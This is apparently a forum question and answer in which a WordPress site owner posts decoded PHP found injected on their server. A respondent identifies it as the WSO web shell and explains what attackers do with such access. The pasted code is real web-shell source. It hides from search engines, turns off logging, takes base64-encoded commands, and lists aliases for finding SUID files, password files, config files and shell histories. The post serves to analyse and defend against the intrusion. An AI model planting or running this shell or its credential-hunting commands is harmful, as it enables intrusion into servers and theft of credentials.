What does this Malicious PHP code found on my Wordpress actually do?

Question

Unfortunatelly I am not a PHP programmer and am not fully able to follow what happens in the following code.

It was extracted from a php file injected into a Wordpress directory. After several base64 and decompressions I was able to get this:

<?php ?><?php
/* Reject search engines */
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
/* Settings */
$color = '#12ff4f';
$default_charset = 'Windows-1251';
//$auth_pass='2ff14d14e063ac36b593e3d437005300ea2f77bb';//memes
/* Shell Setup */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('allow_url_fopen', true);
@ini_set("allow_url_include", true);
@set_time_limit(0);
/*More Shell Setup*/
if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
if (get_magic_quotes_gpc()) {
    function WSOstripslashes($arr) {
        return is_array($arr) ? array_map('WSOstripslashes', $arr) : stripslashes($arr);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}
function WSOb64decode($arr) {
    return is_array($arr) ? array_map('WSOb64decode', $arr) : base64_decode($arr);
}
function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), base64_encode($_POST['pass']));
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
}
$_POST = WSOb64decode($_POST);
$os = (strtolower(substr(PHP_OS, 0, 3)) == 'win') ? 'win' : 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
$aliases = array('List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name "config*"', 'find config* in current dir' => 'find . -type f -name "config*"', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' => 'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf' => 'locate ".conf"', 'locate .pwd' => 'locate ".pwd"', 'locate .sql' => 'locate ".sql"', 'locate .htpasswd' => 'locate ".htpasswd"', 'locate .bash_history' => 'locate ".bash_history"', 'locate .mysql_history' => 'locate ".mysql_history"', 'locate .fetchmailrc' => 'locate ".fetchmailrc"', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv');
if ($os == 'win') {
    $home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',' / ',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . phpincurrentdir'=>'dir / s / w / bindex . php','Find * config * . phpincurrentdir'=>'dir / s / w / b * config * . php','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}

... [full code in pastebin]                                                            

Full Code Pastebin

Appreciate your help in understanding this! Thank you

Answer 1

One of the first things a malicious user will do when exploiting a vulnerability is they try to get a payload to land on the target server -- usually this payload includes a backdoor or some other mechanism to execute arbitrary code and commands, eg to edit files or upload more files.

The code you shared is very readable for an exploit! Usually exploit payloads are encoded or "fuzzed" to make them practically unreadable and harder for virus detection software to detect their signatures. However, you don't necessarily need to follow it line-by-line to see that it sets up an HTML web form and allows execution of some file and directory commands. The payload here appears to be a web shell (which is a common payload) -- ie an HTML-driven app that lets an attacker navigate your file system. It appears to be the WSO Webshell .

What does an attacker do once they have (web) shell access? That's a different question entirely. If an attacker has access to a web site, they can change files (eg maybe they can modify login or payment forms so they collect/email credentials), they could execute arbitrary code (eg to turn your web server into a bot to be recruited in a DDoS attack on some other site), they often attempt to remove your access to the server (eg by removing SSH keys or by changing the server logins), and they could then blackmail you for ransom payment.

I was once offered $5k/month to hack WordPress sites because (the guy claimed) that taking over sites allowed him to collect ad revenue from them. It is (apparently) a profitable business to be in.

Depending on how things are set up they might be able to impersonate you online or find ways to work themselves deeper into your network (eg to steal emails or manipulate vote counts). A professional security audit would help identify the exposure and risk to various attacks.